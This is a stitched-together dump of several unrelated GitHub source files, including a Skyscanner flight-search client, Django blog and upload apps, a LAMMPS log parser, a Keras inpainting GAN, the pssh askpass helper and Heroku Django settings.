    of this file -- confirm they are imported, otherwise this raises NameError.
    Raises IndexError when the autosuggest endpoint returns no places.
    """
    apicall = 'https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/autosuggest/v1.0/UK/USD/en-GB/?query=' + str(location)
    headers = {
        'X-RapidAPI-Host': rapidapi_host,
        'X-RapidAPI-Key': rapidapi_key
    }
    r = requests.get(apicall, headers=headers)
    body = json.loads(r.text)
    places = body['Places']
    # The API returns matches ranked by relevance; take the best one.
    top_place_id = places[0]['PlaceId']
    return top_place_id
def get_country_code(country):
    """Look up the Skyscanner country code for an exact English country name.

    Raises IndexError when *country* does not match any 'Name' in the
    reference list (the [0] below assumes at least one match).
    """
    headers={
        'X-RapidAPI-Host': rapidapi_host,
        'X-RapidAPI-Key': rapidapi_key
    }
    response = requests.get('https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/reference/v1.0/countries/en-GB',
        headers=headers)
    response = json.loads(response.text)
    country_code = [item['Code'] for item in response['Countries'] if item['Name'] == country][0]
    return country_code
def create_session(origin, destination, user_country_code, outbound_date):
    """Create a Skyscanner pricing session and return its session key.

    The key is the last path segment of the 'Location' response header.
    NOTE(review): passenger counts and cabin class are hard-coded below
    (3 adults, 1 child, economy) -- parameterize if wider use is needed.
    """
    apicall = 'https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/pricing/v1.0'
    headers = {
        'X-RapidAPI-Host': rapidapi_host,
        'X-RapidAPI-Key': rapidapi_key,
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    params={
        'cabinClass': 'economy',
        'children': 1,
        'infants': 0,
        'country': user_country_code,
        'currency': 'GBP',
        'locale': 'en-GB',
        'originPlace': origin,
        'destinationPlace': destination,
        'outboundDate': outbound_date,
        'adults': 3
    }
    r = requests.post(apicall, headers=headers, data=params)
    # The session URL comes back in the Location header; its trailing
    # segment is the session key used by poll_results().
    session_key = r.headers['Location'].split('/')[-1]
    return session_key
def poll_results(session_key):
    """Fetch the first page (10 results, sorted by price) for a pricing session.

    Returns the raw 'Itineraries' list from the JSON response.
    """
    apicall = 'https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/pricing/uk2/v1.0/{}?sortType=price&pageIndex=0&pageSize=10'.format(session_key)
    headers = {
        'X-RapidAPI-Host': rapidapi_host,
        'X-RapidAPI-Key': rapidapi_key
    }
    r = requests.get(apicall, headers=headers)
    body = json.loads(r.text)
    itineraries = body['Itineraries']
    return itineraries
def search_flights(origin, destination, user_country, outbound_date):
    """End-to-end one-way search: resolve place IDs, open a pricing session,
    and return a list of (price, deeplink URL) tuples from the first page."""
    country_code = get_country_code(user_country)
    origin_id = get_placeID(origin)
    destination_id = get_placeID(destination)
    session_key = create_session(origin_id, destination_id, country_code, outbound_date)
    return [(option['Price'], option['DeeplinkUrl'])
            for itinerary in poll_results(session_key)
            for option in itinerary['PricingOptions']]
| [
"noreply@github.com"
] | JanAdamiak.noreply@github.com |
d48512e2ee97abb1cf3c6021d83523f168de31df | f3fc5cd59cfd65c5e5d51172b079957e849a925e | /blog/models.py | d430c2a9da72dcd287bb4def656208b7658908ac | [] | no_license | 994850029/BBS | e636070d765ea92f79bd4ecd40cbcef7bf0b15ff | 9ea09b99572994cee56cb8175df6b2978066ff2c | refs/heads/master | 2020-04-10T22:36:28.959686 | 2018-12-11T12:31:10 | 2018-12-11T12:31:10 | 161,327,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,190 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UserInfo(AbstractUser):
    """Site user: extends Django's AbstractUser with phone, avatar and a blog."""
    id = models.AutoField(primary_key=True)
    phone = models.CharField(max_length=16)
    # Falls back to a bundled default image when the user uploads none.
    avatar = models.FileField(upload_to='avatar/', default='avatar/default.png')
    create_date = models.DateTimeField(auto_now_add=True)
    # A user owns at most one blog; nullable so accounts can exist without one.
    blog = models.OneToOneField(to='Blog', to_field='id',null=True,blank=True)
    class Meta:
        # Table name shown in the admin site.
        verbose_name='用户表'
        # Reuse the singular name so the admin doesn't append an 's'.
        verbose_name_plural=verbose_name
class Blog(models.Model):
    """A user's personal blog site (title, display name and theme)."""
    id = models.AutoField(primary_key=True)
    title = models.CharField(max_length=64, null=True,blank=True)
    site_name = models.CharField(max_length=64)
    theme = models.CharField(max_length=64)
    class Meta:
        verbose_name = '博客'
        verbose_name_plural = verbose_name
    def __str__(self):
        return self.site_name
class Category(models.Model):
    """Per-blog article category."""
    id = models.AutoField(primary_key=True)
    title = models.CharField(max_length=64)
    blog = models.ForeignKey(to='Blog', to_field='id', null=True,blank=True)
    def __str__(self):
        return self.title
class Tag(models.Model):
    """Per-blog article tag (linked to articles through ArticleToTag)."""
    id = models.AutoField(primary_key=True)
    title = models.CharField(max_length=64)
    blog = models.ForeignKey(to='Blog', to_field='id', null=True,blank=True)
    def __str__(self):
        return self.title
class Article(models.Model):
    """Blog post with denormalized comment/upvote/downvote counters."""
    id = models.AutoField(primary_key=True)
    title = models.CharField(max_length=64)
    desc = models.CharField(max_length=255)
    create_time = models.DateTimeField(auto_now_add=True)
    # Cached counters, presumably kept in sync with Commit/UpAndDown rows
    # by application code -- confirm where they are updated.
    commit_num = models.IntegerField(default=0)
    up_num = models.IntegerField(default=0)
    down_num = models.IntegerField(default=0)
    content = models.TextField()
    category = models.ForeignKey(to='Category', to_field='id', null=True,blank=True)
    blog = models.ForeignKey(to='Blog', to_field='id', null=True,blank=True)
    # Explicit through model so the m2m rows can be queried directly.
    tag = models.ManyToManyField(to='Tag', through='ArticleToTag', through_fields=('article', 'tag'))
    class Meta:
        verbose_name = '文章'
        verbose_name_plural = verbose_name
    def __str__(self):
        return self.title
class ArticleToTag(models.Model):
    """Through table for the Article <-> Tag many-to-many relation."""
    id = models.AutoField(primary_key=True)
    article = models.ForeignKey(to='Article', to_field='id')
    tag = models.ForeignKey(to='Tag', to_field='id')
class Commit(models.Model):
    """Comment on an article; `parent` makes threaded replies possible."""
    id = models.AutoField(primary_key=True)
    user = models.ForeignKey(to='UserInfo', to_field='id')
    article = models.ForeignKey(to='Article', to_field='id')
    content = models.TextField()
    commit_time = models.DateTimeField(auto_now_add=True)
    # Self-reference: NULL for top-level comments, otherwise the replied-to comment.
    parent = models.ForeignKey(to='self', to_field='id', null=True)
    class Meta:
        verbose_name = '评论'
        verbose_name_plural = verbose_name
class UpAndDown(models.Model):
    """A single up/down vote; each user may vote at most once per article."""
    id = models.AutoField(primary_key=True)
    user = models.ForeignKey(to='UserInfo', to_field='id')
    article = models.ForeignKey(to='Article', to_field='id')
    # True = upvote, False = downvote.
    is_up = models.BooleanField()
    class Meta:
        # One vote per (user, article) pair, enforced at the DB level.
        unique_together = (('user', 'article'),)
| [
"zhoujianhao1996@163.com"
] | zhoujianhao1996@163.com |
5bbd81e71786da7c4b8ed168d164b7ea168232c6 | 2e0e6b21fcfa203b42d90155eb2a341706586305 | /apps/tv_show_app/models.py | 5c05bdb6b5a2710d362f0e8a37ad677ee73f485f | [] | no_license | jesserowan/tv_show_app | e020f5a8b0f44f984707b00e2549ca51666be288 | 9368de5ecf03fb01e76d07e49bba734aaa731dca | refs/heads/master | 2020-04-11T00:57:08.595255 | 2018-12-12T17:33:08 | 2018-12-12T17:33:08 | 161,401,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | from django.db import models
class MovieManager(models.Manager):
    """Custom manager providing form validation for show submissions."""
    def validator(self, form):
        """Validate a show form mapping.

        Returns a dict of field -> error message; an empty dict means the
        form is valid.
        """
        errors = {}
        # Minimum of 3 matches the error message below and the network rule
        # (the original `< 2` contradicted its own "three characters" text).
        if len(form['title']) < 3:
            errors["title"] = "Show title must be at least three characters."
        if len(form['network']) < 3:
            errors['network'] = "Show network must be at least three characters."
        if not form['air_date']:
            errors['date'] = "You must enter an air date."
        # Description is optional, but a non-empty one must have >= 10 chars.
        if 0 < len(form['description']) < 10:
            errors['description'] = "Show description is optional, but if entered, it must be at least ten characters."
        return errors
class Movie(models.Model):
    """TV show record (the class is named Movie for historical reasons)."""
    title = models.CharField(max_length=255)
    network = models.CharField(max_length=255)
    air_date = models.DateField()
    description = models.TextField(max_length=1000)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    # Default manager replaced so Movie.objects.validator(...) is available.
    objects = MovieManager()
    def __repr__(self):
        return f"<ID {self.id} - Title: {self.title} Network: {self.network}>" | [
"jesserowan@gmail.com"
] | jesserowan@gmail.com |
d2278f13afd43cc63a7558c4ca8f27c6351c5013 | d6c54a9cb57a6f5b88aaef157e9e2870e4fd86af | /Day 4/day4.py | 7c6356fe5515b7450a46379353f89dffb6322346 | [] | no_license | vishaka-mohan/30-Days-of-Code-Challenge | fce1c1b9d9760f8d3308326d3244a2bfa8f5e971 | 8f3197aa9e9075ab5bebf442545f739e82327507 | refs/heads/main | 2023-02-02T16:31:07.828019 | 2020-12-21T15:22:50 | 2020-12-21T15:22:50 | 314,985,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 852 | py | class Person:
def __init__(self,initialAge):
# Add some more code to run some checks on initialAge
if initialAge < 0:
self.age = 0
print("Age is not valid, setting age to 0.")
else:
self.age = initialAge
def amIOld(self):
# Do some computations in here and print out the correct statement to the console
if self.age < 13:
print("You are young.")
elif self.age >= 13 and self.age < 18:
print("You are a teenager.")
else:
print("You are old.")
def yearPasses(self):
# Increment the age of the person in here
self.age += 1
# Driver: read the number of test cases; for each, read an age, print the
# person's bracket, age them three years, and print the bracket again.
t = int(input())
for i in range(0, t):
    age = int(input())
    p = Person(age)
    p.amIOld()
    for j in range(0, 3):
        p.yearPasses()
    p.amIOld()
    # Blank line separates consecutive test cases.
    print("")
| [
"pflight0211@gmail.com"
] | pflight0211@gmail.com |
303fc6326ae21120dac1f0562abb3e0ff08d4265 | e7e422cfbf3928daa9d03bb54957843407ccff64 | /experimental/gcp/trainer/model.py | 356ef1284071d5cba032f00efc89b28945e096b2 | [] | no_license | gsnaider/two-face-inpainting | ec9c144a830eeb3e7379a5b2230c43058b953423 | eb9d1f31792634f0922086f83361ccc0d18728c3 | refs/heads/master | 2023-07-06T13:25:58.113293 | 2023-06-22T12:45:11 | 2023-06-22T12:45:11 | 155,004,562 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,495 | py | import tensorflow as tf
def make_encoders():
    """Build the frozen ImageNet-pretrained VGG16 feature extractors.

    Returns (encoder, vgg16): `encoder` is VGG16 truncated at layers[-6]
    (the last 5 layers dropped), used by the generator; the full headless
    `vgg16` is used by the discriminator.  Both are non-trainable.
    """
    vgg16 = tf.keras.applications.vgg16.VGG16(include_top=False,
                                              weights='imagenet',
                                              input_tensor=None,
                                              input_shape=(128, 128, 3))
    vgg16.trainable = False
    # Truncate: keep everything up to the 6th-from-last layer's output.
    encoder = tf.keras.Model(inputs = vgg16.inputs, outputs=vgg16.layers[-6].output)
    encoder.trainable = False
    return encoder, vgg16
def make_generator_model(gen_encoder):
    """Build the inpainting generator.

    Encodes the masked image and a reference face with the shared frozen
    encoder, concatenates the encodings, and decodes them into a 32x32x3
    patch in [0, 1] (sigmoid output).  Inline comments track tensor shapes.
    """
    masked_image = tf.keras.Input(shape=(128, 128, 3,), name='masked_image')
    masked_encoding = gen_encoder(masked_image)
    # 16x16x512
    reference_image = tf.keras.Input(shape=(128, 128, 3,), name='reference_image')
    reference_encoding = gen_encoder(reference_image)
    # 16x16x512
    encoding = tf.keras.layers.concatenate([masked_encoding, reference_encoding], axis=-1)
    # 16x16x1024
    # Decoder
    encoding = tf.keras.layers.Conv2DTranspose(256, (2, 2),
                                               strides=(1, 1),
                                               padding='same',
                                               use_bias=False,
                                               input_shape=(16,16,1024))(encoding)
    encoding = tf.keras.layers.BatchNormalization()(encoding)
    encoding = tf.keras.layers.LeakyReLU()(encoding)
    # 16x16x256
    encoding = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same', use_bias=False)(encoding)
    encoding = tf.keras.layers.BatchNormalization()(encoding)
    encoding = tf.keras.layers.LeakyReLU()(encoding)
    # 32x32x32
    generated_patch = tf.keras.layers.Conv2DTranspose(3, (5, 5),
                                                      strides=(1, 1),
                                                      padding='same',
                                                      use_bias=False,
                                                      activation='sigmoid')(encoding)
    # 32x32x3
    return tf.keras.Model(inputs=[masked_image, reference_image], outputs=generated_patch)
def make_discriminator_model(disc_encoder):
    """Build the discriminator.

    Both the candidate image and the reference face go through the shared
    frozen encoder, are reduced to 1x1 conv features, flattened, concatenated,
    and classified.  Returns raw logits (no sigmoid); pair with a
    sigmoid-cross-entropy loss.  Inline comments track tensor shapes.
    """
    image = tf.keras.Input(shape=(128, 128, 3,), name='image')
    image_encoding = disc_encoder(image)
    # 4x4x512
    image_encoding = tf.keras.layers.Conv2D(64, (1, 1),
                                            strides=(1, 1),
                                            padding='same',
                                            input_shape=(4, 4, 512))(image_encoding)
    image_encoding = tf.keras.layers.BatchNormalization()(image_encoding)
    image_encoding = tf.keras.layers.LeakyReLU()(image_encoding)
    # 4x4x64
    image_encoding = tf.keras.layers.Flatten()(image_encoding)
    # 1024
    reference_image = tf.keras.Input(shape=(128, 128, 3,), name='reference_image')
    reference_encoding = disc_encoder(reference_image)
    # 4x4x512
    reference_encoding = tf.keras.layers.Conv2D(64, (1, 1),
                                                strides=(1, 1),
                                                padding='same',
                                                input_shape=(4, 4, 512))(reference_encoding)
    reference_encoding = tf.keras.layers.BatchNormalization()(reference_encoding)
    reference_encoding = tf.keras.layers.LeakyReLU()(reference_encoding)
    # 4x4x64
    reference_encoding = tf.keras.layers.Flatten()(reference_encoding)
    # 1024
    encoding = tf.keras.layers.concatenate([image_encoding, reference_encoding], axis=-1)
    # 2048
    # Classifier
    encoding = tf.keras.layers.Dense(128, activation=tf.nn.leaky_relu)(encoding)
    logits = tf.keras.layers.Dense(1)(encoding)
    return tf.keras.Model(inputs=[image, reference_image], outputs=logits)
def generator_loss(generated_output):
    """Generator loss: sigmoid cross-entropy of the discriminator's logits on
    generated images against all-ones labels (i.e. reward being judged real)."""
    return tf.losses.sigmoid_cross_entropy(tf.ones_like(generated_output), generated_output)
def discriminator_loss(real_output, generated_output):
    """Discriminator loss: real logits vs. ones plus generated logits vs. zeros."""
    real_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=tf.ones_like(real_output), logits=real_output)
    generated_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=tf.zeros_like(generated_output), logits=generated_output)
    total_loss = real_loss + generated_loss
    return total_loss
def make_models():
    """Build and return the (generator, discriminator) pair; the generator
    gets the truncated VGG16 encoder, the discriminator the full one."""
    gen_encoder, disc_encoder = make_encoders()
    generator = make_generator_model(gen_encoder)
    discriminator = make_discriminator_model(disc_encoder)
    return generator, discriminator | [
"gnsnaider@gmail.com"
] | gnsnaider@gmail.com |
bac4166e2656f6b43ea25ab3081d9a3b5dddd470 | 69c27fd35685d9dc45a167f06e36fa9c89b7f1db | /psshlib/askpass_client.py | 5dc6dc654556bdd5f007a4806a3061a0328d0a2f | [
"BSD-3-Clause"
] | permissive | gyf19/parallel-ssh | 3476dd9e7966fdb4790ae2178010ef9b86cad01d | bf80ac747416a754da9f2a538692df4a088b1415 | refs/heads/master | 2020-05-24T14:56:07.201321 | 2016-01-04T12:47:48 | 2016-01-04T12:47:48 | 44,253,907 | 0 | 0 | null | 2015-10-14T14:39:48 | 2015-10-14T14:39:48 | null | UTF-8 | Python | false | false | 3,462 | py | #!/usr/bin/env python
# -*- Mode: python -*-
# Copyright (c) 2009, Andrew McNabb
"""Implementation of SSH_ASKPASS to get a password to ssh from pssh.
The password is read from the socket specified by the environment variable
PSSH_ASKPASS_SOCKET. The other end of this socket is pssh.
The ssh man page discusses SSH_ASKPASS as follows:
If ssh needs a passphrase, it will read the passphrase from the current
terminal if it was run from a terminal. If ssh does not have a terminal
associated with it but DISPLAY and SSH_ASKPASS are set, it will execute
the program specified by SSH_ASKPASS and open an X11 window to read the
passphrase. This is particularly useful when calling ssh from a .xsession
or related script. (Note that on some machines it may be necessary to
redirect the input from /dev/null to make this work.)
"""
import os
import socket
import sys
import textwrap
# Candidate locations of the pssh-askpass helper: first next to this script,
# then the usual install prefixes.
bin_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
askpass_bin_path = os.path.join(bin_dir, 'pssh-askpass')
ASKPASS_PATHS = (askpass_bin_path,
                 '/usr/libexec/pssh/pssh-askpass',
                 '/usr/local/libexec/pssh/pssh-askpass',
                 '/usr/lib/pssh/pssh-askpass',
                 '/usr/local/lib/pssh/pssh-askpass')
# Cache for executable_path(); None means "not determined yet".
_executable_path = None
def executable_path():
    """Determines the value to use for SSH_ASKPASS.

    The first executable candidate from ASKPASS_PATHS wins; an empty string
    (plus a warning) is cached when none qualifies.  The value is cached
    since this may be called many times.
    """
    global _executable_path
    if _executable_path is None:
        found = next((p for p in ASKPASS_PATHS if os.access(p, os.X_OK)), None)
        if found is not None:
            _executable_path = found
        else:
            _executable_path = ''
            sys.stderr.write(textwrap.fill("Warning: could not find an"
                " executable path for askpass because PSSH was not"
                " installed correctly. Password prompts will not work."))
            sys.stderr.write('\n')
    return _executable_path
def askpass_main():
    """Connects to pssh over the socket specified at PSSH_ASKPASS_SOCKET.

    Exit codes: 1 for prompt/configuration problems, 2 when the socket
    connection fails, 3 on a read error.  On success the password is written
    to stdout (which ssh reads).
    """
    verbose = os.getenv('PSSH_ASKPASS_VERBOSE')
    # It's not documented anywhere, as far as I can tell, but ssh may prompt
    # for a password or ask a yes/no question. The command-line argument
    # specifies what is needed.
    if len(sys.argv) > 1:
        prompt = sys.argv[1]
        if verbose:
            sys.stderr.write('pssh-askpass received prompt: "%s"\n' % prompt)
        # Anything that isn't a password prompt (e.g. a yes/no host-key
        # question) is surfaced on stderr and treated as a failure.
        if not prompt.strip().lower().endswith('password:'):
            sys.stderr.write(prompt)
            sys.stderr.write('\n')
            sys.exit(1)
    else:
        sys.stderr.write('Error: pssh-askpass called without a prompt.\n')
        sys.exit(1)
    address = os.getenv('PSSH_ASKPASS_SOCKET')
    if not address:
        sys.stderr.write(textwrap.fill("pssh error: SSH requested a password."
            " Please create SSH keys or use the -A option to provide a"
            " password."))
        sys.stderr.write('\n')
        sys.exit(1)
    sock = socket.socket(socket.AF_UNIX)
    try:
        sock.connect(address)
    except socket.error:
        # Python 2/3 compatible way to capture the active exception.
        _, e, _ = sys.exc_info()
        # NOTE(review): assumes the error has a (errno, message) args pair;
        # some socket errors carry a single argument -- confirm.
        message = e.args[1]
        sys.stderr.write("Couldn't bind to %s: %s.\n" % (address, message))
        sys.exit(2)
    try:
        password = sock.makefile().read()
    except socket.error:
        sys.stderr.write("Socket error.\n")
        sys.exit(3)
    # print() appends the newline ssh expects after the password.
    print(password)
if __name__ == '__main__':
askpass_main()
| [
"amcnabb@mcnabbs.org"
] | amcnabb@mcnabbs.org |
715eb56d71c1ac53cf5f55734d8912762f615015 | acdae5a1563fe982b622bf78b65d963380f9b989 | /getcolumn.py | c252093219f4355f1a7a488e2e9f705463dbc8f8 | [] | no_license | pauliwu/LAMMPSExtractData | 4dd8bfa6052470b600e9d942a9ff2f30c8a4b084 | 048797f123bb21a8aa101beea494ea4f04124255 | refs/heads/master | 2021-05-29T05:56:56.887316 | 2011-10-24T13:50:56 | 2011-10-24T13:50:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,559 | py | #######################################################################################
## :: Extract specific column data and time from LAMMPS log files :: ##
## Usage: <python getcolumn.py> ##
## ##
## Brett Donovan 2011 ##
#######################################################################################
import os
import shutil
import sys
import re
def main(argv):
    """Extract "<step> <column-value>" rows from a LAMMPS log file.

    argv: [prog, input_log, column_index, output_file, start_step].
    Rows are collected only after a header line containing 'Step', and only
    when the first field is numeric and greater than start_step.
    Returns 0 on success, 1 on a usage error or missing input file.
    """
    if len(argv) < 5:
        sys.stderr.write("Usage: %s <io_filename> <column> <op_filename> <startn>\n" % (argv[0],))
        return 1
    if not os.path.exists(argv[1]):
        sys.stderr.write("ERROR: filename %r was not found!\n" % (argv[1],))
        return 1
    column = int(argv[2])
    start_step = float(argv[4])
    number_re = re.compile(r'\d+')
    # Context managers guarantee both files are closed even on errors
    # (the original left them open if an exception occurred mid-loop).
    with open(argv[1], "r") as src, open(argv[3], "w") as dst:
        # LAMMPS thermo output begins after a header line containing 'Step';
        # everything before it is ignored.
        collect = False
        for line in src:
            if "Step" in line:
                collect = True
            if collect and number_re.search(line):
                fields = line.split()
                # Only rows whose first token is numeric are data rows.
                if number_re.search(fields[0]) and float(fields[0]) > start_step:
                    dst.write(fields[0] + " " + fields[column] + "\n")
    return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
| [
"membrane3000@gmail.com"
] | membrane3000@gmail.com |
54d62dff4559c37642cd120d5a7827eec37549af | 6a982a8696e8213879544d52584ac21e3ba3e3ff | /indofoodv1/settings.py | 239cfd3fc6a16c92d9baccef0be0f543cfe5e8df | [] | no_license | Mattmont415/IndonesianCuisine-Django | 8eaf764308247c149ad872deb11d3f7971d187af | fb7029a1e187c42ffb532db6bd6a9d326f2b8ecd | refs/heads/main | 2023-02-17T16:21:12.235406 | 2021-01-10T02:00:12 | 2021-01-10T02:00:12 | 304,168,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,580 | py | """
Django settings for indofoodv1 project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import django_heroku
import os
import psycopg2
from django.core.mail import send_mail
import dj_database_url
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
#SECRET_KEY = 'e24ic&8-#z2z3rq3r2_64r5=*57bbr#gl1a-du%37xgf61&*qa'
# NOTE(review): a real-looking secret key is committed as the env-var
# fallback below.  If it was ever used in production it should be rotated,
# and the fallback removed so a missing DJANGO_SECRET_KEY fails loudly.
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY','e24ic&8-#z2z3rq3r2_64r5=*57bbr#gl1a-du%37xgf61&*qa')
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG = True
# DEBUG is True unless DJANGO_DEBUG is exactly the string 'False'.
DEBUG = os.environ.get('DJANGO_DEBUG', '') != 'False'
ALLOWED_HOSTS = ['floating-beyond-46802.herokuapp.com','127.0.0.1','0.0.0.0','192.168.1.33','192.168.1.163']
# Application definition
INSTALLED_APPS = [
'main',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'indofoodv1.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'indofoodv1.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
#For heroku stuff
# Heroku: Update database configuration from $DATABASE_URL.
# NOTE(review): dj_database_url is already imported at the top of this file;
# this second import is redundant and should be removed.
import dj_database_url
db_from_env = dj_database_url.config(conn_max_age=500)
# NOTE(review): this merge is later replaced wholesale by the
# `DATABASES['default'] = dj_database_url.config(...)` assignment further
# down in this file, so only one of the two configurations takes effect.
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
#
#
#
# Handling database
DATABASES['default'] = dj_database_url.config(conn_max_age=600, ssl_require=True)
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#The below email settings have been temporarily put on hold ***
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# The absolute path to the directory where collectstatic will collect static files for deployment.
STATIC_ROOT = BASE_DIR / 'staticfiles' #. os.path.join(BASE_DIR, 'staticfiles')
# The URL to use when referring to static files (where they will be served from)
STATIC_URL = '/static/'
# Activate Django-Heroku.
django_heroku.settings(locals())
#Dealing with API to handle sending e-mails from the order page
# SECURITY WARNING (review): live-looking SMTP credentials are hard-coded
# below.  Move EMAIL_HOST_USER / EMAIL_HOST_PASSWORD into environment
# variables and rotate this password.
SENDGRID_API_KEY = os.getenv('SENDGRID_API_KEY')
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = 'tonisfabkitchen@gmail.com'
EMAIL_HOST_PASSWORD = 'ABCdef123456'
EMAIL_USE_TLS = True
#EMAIL_USE_SSL = False
#Email settings for sample thing
| [
"mattmont415@gmail.com"
] | mattmont415@gmail.com |
51d9e57f7a58b55d44ff489a9f2f39a58843a3b9 | 9a45316be7bf74190adf6d7e40a92ebf634fc312 | /upload/views.py | 943a111ea85ecbaf91370644536105cc58610cbc | [] | no_license | dapeige/Mirror_repo_test | 6e280c844653ac90079c05908eee8ab0898d3100 | 2646cf1a9386823529a2df02661a815804636d94 | refs/heads/master | 2021-08-11T07:11:52.066283 | 2016-10-21T05:50:47 | 2016-10-21T05:50:47 | 110,527,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | from django.shortcuts import render
from django import forms
from django.http import HttpResponse, HttpResponseRedirect
from upload.models import *
import logging
# Create your views here.
# Upload form with a single required file field holding the ISO image
# (the old comment about username/headImg fields was stale).
class NormalUserForm(forms.Form):
    isofile = forms.FileField()
# Handles both the GET (render form) and POST (validate + save) flows.
def registerNormalUser(request):
    """Upload view: authenticated users may submit an .iso file.

    GET renders the empty upload form; a valid POST persists a NormalUser
    row describing the upload and redirects to the admin page.  An invalid
    POST re-renders the bound form; unauthenticated users get a plain error.
    """
    if not request.user.is_authenticated():
        return HttpResponse('please log in the platform')
    if request.method == "POST":
        uf = NormalUserForm(request.POST, request.FILES)
        if uf.is_valid():
            version = uf.cleaned_data['isofile']
            # Only ".iso" uploads are accepted (case-sensitive, as before).
            if not str(version).endswith(".iso"):
                return HttpResponse('please check the format')
            normalUser = NormalUser()
            normalUser.version = version
            # NOTE(review): owner is hard-coded; presumably it should come
            # from request.user -- confirm before changing.
            normalUser.ownername = "admin"
            normalUser.isofile = uf.cleaned_data['isofile']
            normalUser.state = "pre"
            # 'release' is a string flag ("false"), not a bool -- matches the
            # model's expectations elsewhere; confirm before converting.
            normalUser.release = "false"
            normalUser.save()
            return HttpResponseRedirect("/control_admin/")
        # Invalid POST: fall through and re-render with the bound form.
    else:
        uf = NormalUserForm()
    return render(request, 'upload/register.html', {'uf':uf})
| [
"1130497582@qq.com"
] | 1130497582@qq.com |
8c994e8baded11dfb7211bd97cfef1a47f2fdf33 | 8fd314074713b3af02d68fd99fa5bf323283439f | /server/src/uds/dispatchers/__init__.py | 67ac9fa4e1883883983f5b8efeb5bf3c4d4ec13a | [] | no_license | spofa/openuds | 099f5d4b4eaf54064d3c2f22a04653d304552294 | a071ce5e3ed7a3e8973431cc2e884ff4219b8056 | refs/heads/master | 2021-07-04T14:16:13.810597 | 2017-09-21T13:50:07 | 2017-09-21T13:50:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2012 Virtual Cable S.L.
# All rights reserved.
#
'''
@author: Adolfo Gómez, dkmaster at dkmon dot com
'''
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
'''
Service modules for uds are contained inside this package.
To create a new service module, you will need to follow this steps:
1.- Create the service module, probably based on an existing one
2.- Insert the module package as child of this package
3.- Import the class of your service module at __init__. For example::
from Service import SimpleService
4.- Done. At Server restart, the module will be recognized, loaded and treated
The registration of modules is done locating subclases of :py:class:`uds.core.auths.Authentication`
.. moduleauthor:: Adolfo Gómez, dkmaster at dkmon dot com
'''
def __init__():
    """Import every child module of this package so each dispatcher can
    register itself on import (e.g. inside ServiceProviderFactory).
    """
    import os.path
    import pkgutil
    import sys
    # Dynamically import children of this package. The __init__.py files
    # must register, if needed, inside ServiceProviderFactory.
    pkgpath = os.path.dirname(sys.modules[__name__].__file__)
    for _, name, _ in pkgutil.iter_modules([pkgpath]):
        try:
            logger.info('Loading dispatcher {}'.format(name))
